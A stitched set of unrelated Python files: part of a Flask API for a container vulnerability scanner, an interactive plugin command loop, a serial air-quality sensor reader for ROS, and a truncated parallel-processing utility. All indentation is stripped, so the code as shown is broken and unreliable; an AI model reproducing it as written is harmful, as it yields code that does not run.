def update_scheduled_tasks():
"""
Scheduled Tasks API
---
tags:
- Scheduled Tasks
security:
- Bearer: []
operationId: updateScheduledTasks
description: Enable, disable or delete scheduled tasks
parameters:
- in: body
name: Options
description: Options to enable, disable or delete scheduled tasks
schema:
type: object
properties:
action:
type: string
enum: [enable, disable, delete]
description: Action to perform - `enable`, `disable` or `delete`
scheduled_task_id_list:
type: array
uniqueItems: true
required: true
description: List of scheduled task ids
example: [1,3,5]
items:
type: integer
responses:
201:
description: Updated successfully.
400:
description: Bad request.
"""
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
action = request.json.get("action", "enable")
if action not in ["enable", "disable", "delete"]:
raise InvalidUsage("action must be enable, disable or delete")
scheduled_task_id_list = request.json.get("scheduled_task_id_list")
if not scheduled_task_id_list:
raise InvalidUsage("scheduled_task_id_list is required")
if type(scheduled_task_id_list) != list:
raise InvalidUsage("scheduled_task_id_list must be list")
if action == "delete":
Scheduler.bulk_delete_schedules(Scheduler.query.filter(Scheduler.id.in_(scheduled_task_id_list)))
else:
is_enabled = True
if action == "disable":
is_enabled = False
Scheduler.bulk_update_schedules(Scheduler.query.filter(Scheduler.id.in_(scheduled_task_id_list)), is_enabled)
return set_response(status=201)
@resource_api.route("/node_action", methods=["POST"], endpoint="api_v1_5_node_action")
@jwt_required
def node_action():
"""
Node Action API
---
tags:
- Node Action
security:
- Bearer: []
operationId: nodeAction
description: Start or schedule scan, get reports, etc for a set of nodes
parameters:
- in: body
name: Options
description: Options to enumerate nodes
schema:
type: object
properties:
node_type:
type: string
required: true
description: Node type
enum: [host, container, container_image, registry_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
action:
type: string
required: true
description: Action to perform
enum: [cve_scan_start, cve_scan_status, schedule_vulnerability_scan, download_report, send_report]
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
post_data = request.json
if not post_data:
raise InvalidUsage("Missing JSON post data in request")
node_type = post_data.get("node_type", None)
if node_type not in constants.NODE_BULK_ACTIONS:
raise InvalidUsage("node_type {0} not supported".format(node_type))
action = post_data.get("action", None)
if action not in constants.NODE_BULK_ACTIONS[node_type]:
raise InvalidUsage("action {0} not supported for node_type {1}".format(action, node_type))
current_user = get_jwt_identity()
user = User.query.filter_by(id=current_user["id"]).one_or_none()
if action != constants.NODE_ACTION_DOWNLOAD_REPORT:
if user.role.name not in [constants.USER_ROLES.ADMIN_USER, constants.USER_ROLES.NORMAL_USER]:
raise Forbidden("User not permitted to perform this action")
node_ids = post_data.get("node_id_list", [])
if type(node_ids) != list:
node_ids = []
registry_images = post_data.get("registry_images", {})
if type(registry_images) != dict:
registry_images = {}
from config.redisconfig import redis
df_id_to_scope_id_map = {}
topology_data_df_format = {}
include_dead_nodes = bool(post_data.get("include_dead_nodes", False))
node_action_details = {"node_type": node_type, "include_dead_nodes": include_dead_nodes}
action_args = post_data.get("action_args", {})
if action_args and type(action_args) != dict:
raise InvalidUsage("action_args should be in json format")
if not action_args:
action_args = {}
accepted_action_args = ["cron", "description", "scan_type", "filters", "resources",
"report_email", "duration", "registry_credentials", "delete_resources"]
action_args = {k: v for k, v in action_args.items() if k in accepted_action_args}
filters = action_args.get("filters", {})
if type(filters) != dict:
raise InvalidUsage("action_args.filters must be a json")
if filters:
node_action_details["filters"] = filters
# "filters", "resources", "report_email" - for download report / send report
# resources - [{"type":"cve","filter":{"cve_severity":["critical"]}}]
report_resources = action_args.get("resources", [])
if type(report_resources) != list:
raise InvalidUsage("action_args.resources must be list")
if report_resources:
node_action_details["resources"] = report_resources
report_email = action_args.get("report_email", "")
if report_email:
node_action_details["report_email"] = str(report_email)
report_duration = action_args.get('duration', {})
if report_duration and type(report_duration) != dict:
raise InvalidUsage("action_args.duration must be json")
if report_duration:
duration_number = report_duration.get('number')
duration_time_unit = report_duration.get('time_unit')
if duration_number:
try:
duration_number = int(duration_number)
except ValueError:
raise InvalidUsage("Number should be an integer value.")
if duration_time_unit and duration_time_unit not in constants.TIME_UNIT_MAPPING.keys():
raise InvalidUsage("time_unit should be one of these, month/day/hour/minute")
node_action_details["duration"] = {"number": duration_number,
"time_unit": constants.TIME_UNIT_MAPPING.get(duration_time_unit)}
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
if not registry_images:
raise InvalidUsage("registry_images is required for node_type registry_image")
if not registry_images.get("registry_id") or type(registry_images["registry_id"]) != int:
raise InvalidUsage("registry_id is required in registry_images key")
if not filters and not registry_images.get("image_name_with_tag_list"):
raise InvalidUsage("image_name_with_tag_list is required in registry_images key")
if registry_images.get("image_name_with_tag_list") and type(
registry_images["image_name_with_tag_list"]) != list:
raise InvalidUsage("image_name_with_tag_list must be a list")
for img in registry_images["image_name_with_tag_list"]:
if not img:
raise InvalidUsage("image_name_with_tag_list must not have empty values")
try:
RegistryCredential.query.get(registry_images["registry_id"])
except:
raise InternalError("Failed to get registry credential {}".format(registry_images["registry_id"]))
node_action_details["registry_images"] = registry_images
else:
if not filters and not node_ids:
raise InvalidUsage("node_id_list is required for node_type {0}".format(node_type))
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node_type.upper())
redis_pipe.get(websocketio_channel_name_format(node_type + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_data_df_format = json.loads(redis_resp[1])
# Temporarily accept scope_id
node_utils = NodeUtils()
node_ids = [node_utils.get_df_id_from_scope_id(scope_id, node_type) for scope_id in node_ids]
node_action_details["node_id_list"] = node_ids
if action in [constants.NODE_ACTION_CVE_SCAN_START, constants.NODE_ACTION_SCHEDULE_CVE_SCAN]:
if node_type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER,
constants.NODE_TYPE_CONTAINER_IMAGE, constants.NODE_TYPE_REGISTRY_IMAGE]:
raise InvalidUsage("action {0} not applicable for node_type {1}".format(action, node_type))
scan_types = action_args.get("scan_type", None)
if not scan_types or type(scan_types) != list:
raise InvalidUsage("scan_type is required and it should be list")
if "base" not in scan_types:
scan_types.append("base")
invalid_scan_types = set(scan_types) - set(constants.CVE_SCAN_TYPES)
if invalid_scan_types:
raise InvalidUsage("scan_type has invalid values: {0}".format(", ".join(invalid_scan_types)))
node_action_details["scan_type"] = scan_types
elif action == constants.NODE_ACTION_CVE_SCAN_STOP:
if node_type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER,
constants.NODE_TYPE_CONTAINER_IMAGE, constants.NODE_TYPE_REGISTRY_IMAGE]:
raise InvalidUsage("action {0} not applicable for node_type {1}".format(action, node_type))
elif action in [constants.NODE_ACTION_DOWNLOAD_REPORT, constants.NODE_ACTION_SCHEDULE_SEND_REPORT]:
if not filters:
raise InvalidUsage("filters is required for this action")
if not report_resources:
raise InvalidUsage("resources is required for this action")
if action == constants.NODE_ACTION_SCHEDULE_SEND_REPORT and not report_email:
raise InvalidUsage("report_email is required for schedule_send_report action")
node_action_details_user_activity = deepcopy(node_action_details)
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
# TODO: get the image names
pass
else:
node_names = []
for node_id in node_ids:
try:
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
if node.name:
node_names.append(node.name)
except:
pass
node_action_details_user_activity["node_id_list"] = node_names
from tasks.user_activity import create_user_activity
create_user_activity.delay(current_user["id"], constants.ACTION_BULK, action,
resources=[node_action_details_user_activity], success=True)
if action in [constants.NODE_ACTION_CVE_SCAN_START]:
from config.app import celery_app
celery_app.send_task(
'tasks.common_worker.common_worker', args=(), queue=constants.CELERY_NODE_ACTION_QUEUE,
kwargs={"action": action, "node_action_details": node_action_details, "task_type": "node_task"})
elif action in [constants.NODE_ACTION_DOWNLOAD_REPORT]:
from tasks.task_scheduler import run_node_task
return run_node_task(action, node_action_details)
elif action in [constants.NODE_ACTION_SCHEDULE_CVE_SCAN, constants.NODE_ACTION_SCHEDULE_SEND_REPORT]:
if not action_args.get("cron"):
raise InvalidUsage("cron is required in action_args key")
if not croniter.is_valid(action_args["cron"]):
raise InvalidUsage("cron is invalid")
node_names = ""
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
node_names = ", ".join(registry_images["image_name_with_tag_list"][:3])
if len(registry_images["image_name_with_tag_list"]) > 3:
node_names += " and more"
else:
tmp_node_names = []
for node_id in node_ids[:3]:
try:
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
tmp_node_names.append(node.name)
except:
pass
node_names = ", ".join(tmp_node_names)
if len(node_ids) > 3:
node_names += " and more"
try:
check_existing = Scheduler.query.filter_by(action=action, nodes=node_action_details).all()
if check_existing:
raise InvalidUsage("A similar schedule already exists")
scheduled_action = Scheduler(
action=action, description=str(action_args.get("description", "")), cron_expr=action_args["cron"],
nodes=node_action_details, is_enabled=True, node_names=node_names, status="")
scheduled_action.save()
except Exception as exc:
raise DFError("Could not save scheduled task", error=exc)
return set_response("Ok")
return set_response("Ok")
@resource_api.route("/enumerate", methods=["POST"], endpoint="api_v1_5_enumerate")
@jwt_required
def enumerate_node():
"""
Enumerate API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: enumerateNodes
description: Enumerate nodes (hosts, containers, images, processes) with optional filters
parameters:
- in: body
name: Options
description: Options to enumerate nodes
schema:
type: object
properties:
size:
type: integer
default: 10
minimum: 1
maximum: 100000
example: 10
description: The number of nodes to return
sort_by:
type: string
example: name
description: Field to sort by
sort_order:
type: string
example: asc
enum: [asc, desc]
description: Sort order
fields:
type: array
example: ["name"]
description: Respond only selected fields
start_index:
type: integer
minimum: 0
maximum: 99999
example: 0
default: 0
description: The number of items to skip before starting to collect the result set
filters:
description: Filter nodes by various fields (key value pairs)
type: object
properties:
type:
type: array
uniqueItems: true
description: Types of node
example: ["host"]
items:
type: string
enum: [host, container, container_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
pseudo:
type: array
uniqueItems: true
description: Pseudo node or not
example: [false]
items:
type: boolean
enum: [true, false]
kernel_version:
type: array
uniqueItems: true
description: Kernel version (for type `host`)
example: ["4.13.0-1019-gcp #23-Ubuntu SMP Thu May 31 16:13:34 UTC 2018"]
items:
type: string
host_name:
type: array
uniqueItems: true
description: Host names
example: ["dev-1", "dev-2"]
items:
type: string
os:
type: array
uniqueItems: true
description: Operating system (for type `host`)
example: ["linux"]
items:
type: string
local_networks:
type: array
uniqueItems: true
description: Local networks in CIDR format (for type `host`)
example: ["127.0.0.1/8", "172.17.0.1/16"]
items:
type: string
interfaceNames:
type: array
uniqueItems: true
description: Interface names (for type `host`)
example: ["lo", "docker0", "eth0"]
items:
type: string
publicIpAddress:
type: array
uniqueItems: true
description: Public IP of host (for type `host`)
example: ["1.2.3.4"]
items:
type: string
kubernetes_node_type:
type: array
uniqueItems: true
description: kubernetes node type (for type `kube_controller`)
example: ["running"]
items:
type: string
enum: [Deployment, DaemonSet, ReplicaSet, CronJob, StatefulSet]
kubernetes_namespace:
type: array
uniqueItems: true
description: kubernetes namespace (for type `pod`, `kube_controller`, `kube_service`). Empty means all.
example: ["default"]
items:
type: string
enum: [default, "", kube-public, kube-system]
tags:
type: array
uniqueItems: true
description: User defined tags
example: ["prod"]
items:
type: string
container_name:
type: array
uniqueItems: true
description: Container name (for type `container`, `container_image`)
example: ["redis", "mysql"]
items:
type: string
image_name:
type: array
uniqueItems: true
description: Container image names (for type `container`, `container_image`)
example: ["redis:latest", "mysql:latest"]
items:
type: string
pid:
type: integer
minimum: 1
description: Process ID (for type `process`)
example: 1225
ppid:
type: integer
minimum: 1
description: Parent process ID (for type `process`)
example: 1225
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
post_data = request.json
if not post_data:
post_data = {}
return set_response(data=resource.get_enumerate_node_data(post_data))
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/status", methods=["POST"], endpoint="api_v1_5_status_api")
@jwt_required
def status_api():
"""
Status API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: statusApi
description: Get status of a previous request by status_id
parameters:
- in: body
name: Options
description: Options
schema:
type: object
properties:
id:
type: string
description: Status ID which was sent in a previous request. If a particular request takes longer, the API call will reply with a status ID. This ID should be used to query the status of that request. If the status is success, the response will include the data URL where the data is available.
required: true
example: "qwkfjwqfkwqkf"
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
properties:
data_url:
type: string
description: Data API url path
id:
type: string
description: id to use when calling data api
status:
type: string
description: If status is `success`, then data is available
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
status_id_encoded = request.json.get("id", None)
if not status_id_encoded:
raise InvalidUsage("id is required.")
status_id = json.loads(resource.decrypt(status_id_encoded))
status = getattr(resource, status_id["type"] + "_status")(status_id["params"], status_id["post_data"])
response = {
"id": status_id_encoded,
"status": status
}
if status == "success":
response["data_url"] = "{0}/data".format(constants.API_URL_PREFIX)
return set_response(data=response)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/data", methods=["POST"], endpoint="api_v1_5_data_api")
@jwt_required
def data_api():
"""
Data API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: dataApi
description: Get data of a previous request by status_id
parameters:
- in: body
name: Options
description: Options
schema:
type: object
properties:
id:
type: string
description: Status ID which was used in the previous status API call. If a particular request takes longer, the API call will reply with a status ID. This ID should be used to query the status of that request. If the status is success, the data will be available at the data URL.
required: true
example: "qwkfjwqfkwqkf"
responses:
200:
description: Request success
properties:
data:
type: object
description: Response data
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
data_id_encoded = request.json.get("id", None)
if not data_id_encoded:
raise InvalidUsage("id is required.")
status_id = json.loads(resource.decrypt(data_id_encoded))
data = getattr(resource, status_id["type"] + "_data")(status_id["params"], status_id["post_data"])
response = {
"id": data_id_encoded,
"data": data,
}
return set_response(data=response)
except Exception as ex:
raise InternalError(str(ex))
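# Illustrative two-step flow tying the enumerate/status/data endpoints together, as
# described in the docstrings above (the id value is whatever the server returned):
#   1. POST a long-running request (e.g. /enumerate) -> response may carry an encrypted "id"
#   2. POST /status with {"id": "<id>"}              -> poll until "status" == "success"
#   3. POST /data   with {"id": "<id>"}              -> response "data" holds the result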
|
app.py
|
import json
import shlex
from os import _exit, chdir, getcwd
from re import compile as re_compile
from re import findall, match
from sys import exc_info, path
from traceback import print_exception
from libs.config import custom_get, gget, gset, order_alias, set_namespace, color
from libs.readline import LovelyReadline
from Myplugin import Platform
NUMBER_PATTERN = re_compile(r"^[-+]?\d*(\.?\d+|)$")
STDIN_STREAM = b''
HISTORY = None
HISTORY_POINTER = 0
FROM_HISTORY = False
readline = LovelyReadline()
readline.init({}, {})
"""
api ['main']
history_commands ['main']
leave_message ['main']
namespace ['main']
namespace_folders ['main']
folders_namespace ['main']
root_path ['main']
{platform}.pf ['main']
{platform}.prompt ['main']
{plugin_name}.reverse_alias [namespace]
order_alias [namespace]
special plugin platform:general general commands
special plugin platform:encode Encoders
"""
class Loop_init:
def __init__(self, api: str = "run", init_namespace: str = "main"):
"""
Initialize the loop
Args:
api (str, optional): The name of the entry function that is common to all plugins. Defaults to "run".
init_namespace (str, optional): Initial namespace. Defaults to "main".
"""
platforms = self.set_platforms()
gset("api", api)
gset("loop", True)
gset("blockexit", False)
gset("namespace", init_namespace)
gset("namespace_folders", platforms)
gset("folders_namespace", {v: k for k, v in platforms.items()})
root_path = gget("root_path")
cwd = getcwd()
chdir(root_path)
# {platform name -> plugin folder path}
for k, v in platforms.items():
pf = import_platform(v, api)
gset(k + ".pf", pf)
# platform -> command word list
gset(k + ".wordlist", {"command_wordlist": list(pf.names())})
# platform -> {command name -> [command arguments, ...]}
gset(k + ".prefix_wordlist", {command: gget(command + ".arg_wordlist", k)
for command in gget(k + ".wordlist")["command_wordlist"]})
general_wordlist = gget("general.wordlist")["command_wordlist"]
for k in platforms.keys():  # merge the general platform's command list into every other platform
if (k == "general"):
continue
wordlist = gget(k + ".wordlist")
wordlist["command_wordlist"] += general_wordlist
# set the input prompt for each platform
for k, v in self.set_prompts().items():
gset(k + ".prompt", v)
chdir(cwd)
def set_platforms(self) -> dict:
return {"main": "main_plugins"}
def set_prompts(self) -> dict:
return {"main": ":>"}
def import_platform(platform_path: str, api: str):
return Platform(platform_path, api, message=True)
def is_numberic(string):
global NUMBER_PATTERN
return True if (len(string) and (isinstance(string, (int, float)) or NUMBER_PATTERN.match(string))) else False
def value_translation(arg):
if is_numberic(arg):
arg = float(arg) if "." in arg else int(arg)
else:
try:
arg = json.loads(arg)
except json.JSONDecodeError:
pass
if (isinstance(arg, str)):
custom_vars = findall(r"#{(\w+)}", arg)
if (match(r"#{(\w+)}", arg)):
arg = custom_get(custom_vars[0], arg)
else:
if (not custom_vars):
return arg
for var in custom_vars:
arg = arg.replace("#{%s}" % var, custom_get(var, ''))
return arg
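# Behaviour sketch of value_translation (illustrative inputs):
#   "3"             -> 3 (int), "2.5" -> 2.5 (float)
#   '{"a": 1}'      -> {"a": 1} (parsed as JSON)
#   "#{target}"     -> custom_get("target", ...) lookup of a stored custom variable
#   "pre #{x} post" -> the string with every #{x} replaced by its stored value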
def args_parse(args: list) -> dict:
arg_name = ""
arg_dict = {"": []}
for each in args:  # parse each argument token
if each.startswith("-"):
if len(each) > 2 and each[1] == "-":
arg_name = each[2:]
elif (is_numberic(each)):
arg_dict[""].append(value_translation(each))
else:
arg_name = each[1:]
arg_dict[arg_name] = True
else:
if arg_name == "":
arg_dict[""].append(value_translation(each))
elif arg_name in arg_dict:
if (arg_dict[arg_name] is True):
arg_dict[arg_name] = value_translation(each)
else:
arg_dict[arg_name] = f"{arg_dict[arg_name]} {value_translation(each)}"
else:
arg_dict[arg_name] = value_translation(each)
if (not len(arg_dict[""])):
del arg_dict[""]
return arg_dict
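# Worked example (illustrative; it follows the parsing rules above):
#   args_parse(["get", "-id", "2", "--name", "demo"])
#   -> {"": ["get"], "id": 2, "name": "demo"}
# Positional tokens are collected under the "" key, "-x" style options start out as True
# and pick up the next token as their value, and "--xx" style options take the next token
# as their value.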
def sys_exit():
print('\n' + gget("leave_message"))
if (gget("log_filepath")):
gget("log_stdout").log.close()
gget("log_stderr").log.close()
_exit(0)
def loop_main():
"""
run_loop main function
"""
gpf = gget("general.pf")
api = gget("api")
old_namespace = ''
while gget("loop"):
# get the current namespace
namespace = gget("namespace")
tpf = None
# get the current platform
npf = gget(f"{namespace}.pf")
# get the custom platform
cpf = gget("custom.pf")
# when switching out of the current platform into another one:
if (namespace != old_namespace):
# initialize the new platform's command word list
wordlist = gget(namespace + ".wordlist")
# initialize the new platform's {command name -> command arguments} map
prefix_wordlist = gget(namespace + ".prefix_wordlist")
# merge in the general platform's argument word list
prefix_wordlist = {**prefix_wordlist, **gget("general.prefix_wordlist")}
# initialize readline with the new word lists
readline.set_wordlist(wordlist)
readline.set_prefix_wordlist(prefix_wordlist)
# remember the namespace we switched to
old_namespace = namespace
# --------------------------------------
# check whether a preloaded command is pending
if (gget("preload_command")):
cmd = gget("preload_command")
gset("preload_command", None, True)
else:
print(gget(f"{namespace}.prompt"), end="", flush=True)
if (gget("raw_input") is True):
cmd = input().strip()
else:
cmd = readline().strip()
# store the raw input command
gset("raw_command", cmd, True)
# skip empty input
if (not cmd):
continue
try:
args = shlex.split(cmd)  # tokenize the command line
except ValueError:
print(color.red("Invalid command"))
continue
# determine whether the input has arguments, and extract the command name
if " " in cmd:  # command followed by arguments
order = args[0]
else:
order = cmd
del args[0]
# store the raw argument string of the input command
raw_command_args = " ".join(args)
gset("raw_command_args", raw_command_args, True)
order = order_alias(order)  # resolve command aliases
# --------------------------------------
# check whether the command exists in [current platform] / [general] / [custom platform]
if order in npf:  # command found in the current platform
tpf = npf
elif order in gpf:
tpf = gpf
elif order in cpf:
tpf = cpf
elif cmd:
print(f'\n{order}: {color.red("Command Not Found")}\n')
if tpf:
debug = gget("DEBUG.LOOP")
try:
arg_dict = args_parse(args)  # parse the arguments
tpf[order].run(**arg_dict)
except TypeError as e:
exc_type, exc_value, exc_tb = exc_info()
print("[TypeError] %s" % str(e).replace("%s()" % api, "%s()" % order))
if debug:
print_exception(exc_type, exc_value, exc_tb)
except Exception as e:
exc_type, exc_value, exc_tb = exc_info()
print("[%s] %s" % (exc_type.__name__, e))
if debug:
print_exception(exc_type, exc_value, exc_tb)
def run_loop(loop_init_object: Loop_init, leave_message: str = "Bye!"):
"""
run_loop
Args:
loop_init_object (Loop_init): Loop Init class
leave_message (str, optional): The message when you leave. Defaults to 'Bye!'.
"""
from threading import Thread
from time import sleep
set_namespace("main", callback=False if gget("preload_command") else True)
gset("leave_message", leave_message)
t = Thread(target=loop_main)
t.daemon = True  # Thread.setDaemon() is deprecated
t.start()
while gget("loop"):
try:
sleep(10)
except KeyboardInterrupt:
continue
except EOFError:
break
sys_exit()
|
sensors.py
|
import serial
from threading import Thread
import rospy
from collections import deque
class SEN0233:
def __init__(self):
physicalPort = '/dev/ttyS0'
self.serialPort = serial.Serial(physicalPort)
self.buff = deque(maxlen=4)
def read_most_recent_data(buff: deque):
while True:
if self.serialPort.in_waiting >= 40:
d = self.serialPort.read(40)
CR1 =(d[38]<<8) + d[39]
CR2 = 0
for i in range(38):
CR2 += d[i]
if CR1 == CR2:
PMSa = d[12] # Read PM2.5 High 8-bit
PMSb = d[13] # Read PM2.5 Low 8-bit
PMS = (PMSa<<8)+PMSb # PM2.5 value
FMHDSa = d[28] # Read Formaldehyde High 8-bit
FMHDSb = d[29] # Read Formaldehyde Low 8-bit
FMHDS = (FMHDSa<<8)+FMHDSb # Formaldehyde value
TPSa = d[30] # Read Temperature High 8-bit
TPSb = d[31] # Read Temperature Low 8-bit
TPS = (TPSa<<8)+TPSb # Temperature value
HDSa = d[32] # Read Humidity High 8-bit
HDSb = d[33] # Read Humidity Low 8-bit
HDS = (HDSa<<8)+HDSb # Humidity value
else:
self.serialPort.reset_input_buffer()
PMS = 0
FMHDS = 0
TPS = 0
HDS = 0
buff.append(round(TPS/10, 2))
buff.append(round(HDS/10, 2))
buff.append(round(FMHDS/1000, 3))
buff.append(PMS)
rospy.sleep(0.5)
self.reading_thr = Thread(target=read_most_recent_data, args=(self.buff, ))
self.reading_thr.start()
def data(self) -> dict:
rospy.loginfo("In waiting data: {}".format(self.serialPort.in_waiting))
res = {
"temp_c": self.buff.popleft(),
"humidity": self.buff.popleft(),
"formaldehyde": self.buff.popleft(),
"pm2.5": self.buff.popleft()
}
rospy.loginfo(res)
return res
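# Usage sketch (assumes a running ROS node and the SEN0233 sensor wired to /dev/ttyS0):
#   sensor = SEN0233()
#   rospy.sleep(1.0)          # give the reader thread time to fill the buffer
#   readings = sensor.data()  # {"temp_c": ..., "humidity": ..., "formaldehyde": ..., "pm2.5": ...}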
|
util_parallel.py
|
# -*- coding: utf-8 -*-
"""
Module to execute the same function with different arguments in parallel.
"""
from __future__ import absolute_import, division, print_function
import multiprocessing
from concurrent import futures
# import atexit
# import sys
import signal
import ctypes
import six
import threading
from six.moves import map, range, zip # NOQA
from utool._internal.meta_util_six import get_funcname
from utool import util_progress
from utool import util_arg
from utool import util_inject
from utool import util_cplat
if six.PY2:
# import thread as _thread
import Queue as queue
elif six.PY3:
# import _thread
import queue
util_inject.noinject('[parallel]')
SILENT = util_arg.SILENT
if SILENT:
def print(msg):
pass
# Default number of cores to use when doing parallel processing
__NUM_PROCS__ = util_arg.get_argval(('--nprocs', '--num-procs'), type_=int, default=None)
# If true parallelism is disabled
__FORCE_SERIAL__ = util_arg.get_argflag(
('--utool-force-serial', '--force-serial', '--serial')
)
# FIXME: running tests in IBEIS has errors when this number is low
# Due to the large number of parallel processes running?
__MIN_PARALLEL_TASKS__ = 4
if util_cplat.WIN32:
__MIN_PARALLEL_TASKS__ = 16
def generate2(
func,
args_gen,
kw_gen=None,
ntasks=None,
ordered=True,
force_serial=False,
use_pool=False,
chunksize=None,
nprocs=None,
progkw={},
nTasks=None,
verbose=None,
futures_threaded=True,
timeout=3600,
):
r"""
Interfaces to either multiprocessing or futures.
Essentially maps ``args_gen`` onto ``func`` using pool.imap.
However, each element of args_gen must be a tuple of args that will be unpacked and sent to
the function. Thus, the function can take multiple args. Specifying
keyword args is also supported.
Useful for embarrassingly parallel loops. Currently does not work with
opencv3
CommandLine:
python -m utool.util_parallel generate2
Args:
func (function): live python function
args_gen (?):
kw_gen (None): (default = None)
ntasks (None): (default = None)
ordered (bool): (default = True)
force_serial (bool): (default = False)
verbose (bool): verbosity flag(default = None)
CommandLine:
python -m utool.util_parallel generate2
Example:
>>> # DISABLE_DOCTEST
>>> from utool.util_parallel import * # NOQA
>>> from utool.util_parallel import _kw_wrap_worker # NOQA
>>> import utool as ut
>>> args_gen = list(zip(range(10000)))
>>> kw_gen = [{}] * len(args_gen)
>>> func = ut.is_prime
>>> _ = list(generate2(func, args_gen))
>>> _ = list(generate2(func, args_gen, ordered=False))
>>> _ = list(generate2(func, args_gen, force_serial=True))
>>> _ = list(generate2(func, args_gen, use_pool=True))
>>> _ = list(generate2(func, args_gen, futures_threaded=True))
>>> _ = list(generate2(func, args_gen, ordered=False, verbose=False))
Example:
>>> # ENABLE_DOCTEST
>>> import utool as ut
>>> #num = 8700 # parallel is slower for smaller numbers
>>> num = 500 # parallel has an initial (~.1 second startup overhead)
>>> print('TESTING SERIAL')
>>> func = ut.is_prime
>>> args_list = list(range(0, num))
>>> flag_generator0 = ut.generate2(ut.is_prime, zip(range(0, num)), force_serial=True)
>>> flag_list0 = list(flag_generator0)
>>> print('TESTING PARALLEL (PROCESS)')
>>> flag_generator1 = ut.generate2(ut.is_prime, zip(range(0, num)))
>>> flag_list1 = list(flag_generator1)
>>> print('TESTING PARALLEL (THREAD)')
>>> flag_generator2 = ut.generate2(ut.is_prime, zip(range(0, num)), futures_threaded=True)
>>> flag_list2 = list(flag_generator2)
>>> print('ASSERTING')
>>> assert len(flag_list1) == num
>>> assert len(flag_list2) == num
>>> assert flag_list0 == flag_list1
>>> assert flag_list0 == flag_list2
Example:
>>> # ENABLE_DOCTEST
>>> # Trying to recreate the freeze seen in IBEIS
>>> import utool as ut
>>> print('TESTING SERIAL')
>>> flag_generator0 = ut.generate2(ut.is_prime, zip(range(0, 1)))
>>> flag_list0 = list(flag_generator0)
>>> flag_generator1 = ut.generate2(ut.fibonacci_recursive, zip(range(0, 1)))
>>> flag_list1 = list(flag_generator1)
>>> print('TESTING PARALLEL')
>>> flag_generator2 = ut.generate2(ut.is_prime, zip(range(0, 12)))
>>> flag_list2 = list(flag_generator2)
>>> flag_generator3 = ut.generate2(ut.fibonacci_recursive, zip(range(0, 12)))
>>> flag_list3 = list(flag_generator3)
>>> print('flag_list0 = %r' % (flag_list0,))
>>> print('flag_list1 = %r' % (flag_list1,))
>>> print('flag_list2 = %r' % (flag_list2,))
>>> print('flag_list3 = %r' % (flag_list3,))
Example:
>>> # DISABLE_DOCTEST
>>> # UNSTABLE_DOCTEST
>>> # Trying to recreate the freeze seen in IBEIS
>>> try:
>>> import vtool as vt
>>> except ImportError:
>>> import vtool as vt
>>> import utool as ut
>>> from wbia.algo.preproc.preproc_chip import gen_chip
>>> #from wbia.algo.preproc.preproc_feat import gen_feat_worker
>>> key_list = ['grace.jpg', 'easy1.png', 'ada2.jpg', 'easy3.png',
>>> 'hard3.png', 'zebra.png', 'patsy.jpg', 'ada.jpg',
>>> 'carl.jpg', 'lena.png', 'easy2.png']
>>> img_fpath_list = [ut.grab_test_imgpath(key) for key in key_list]
>>> arg_list1 = [(ut.augpath(img_fpath, '_testgen'), img_fpath, (0, 0, 100, 100), 0.0, (545, 372), []) for img_fpath in img_fpath_list[0:1]]
>>> arg_list2 = [(ut.augpath(img_fpath, '_testgen'), img_fpath, (0, 0, 100, 100), 0.0, (545, 372), []) for img_fpath in img_fpath_list]
>>> #arg_list3 = [(count, fpath, {}) for count, fpath in enumerate(ut.get_list_column(arg_list1, 0))]
>>> #arg_list4 = [(count, fpath, {}) for count, fpath in enumerate(ut.get_list_column(arg_list2, 0))]
>>> ut.remove_file_list(ut.get_list_column(arg_list2, 0))
>>> chips1 = [x for x in ut.generate2(gen_chip, arg_list1)]
>>> chips2 = [y for y in ut.generate2(gen_chip, arg_list2, force_serial=True)]
>>> #feats3 = [z for z in ut.generate2(gen_feat_worker, arg_list3)]
>>> #feats4 = [w for w in ut.generate2(gen_feat_worker, arg_list4)]
Example:
>>> # DISABLE_DOCTEST
>>> # FAILING_DOCTEST
>>> # Trying to recreate the freeze seen in IBEIS
>>> # Extremely weird case: freezes only if dsize > (313, 313) AND __testwarp was called beforehand.
>>> # otherwise the parallel loop works fine. Could be an opencv 3.0.0-dev issue.
>>> try:
>>> import vtool as vt
>>> except ImportError:
>>> import vtool as vt
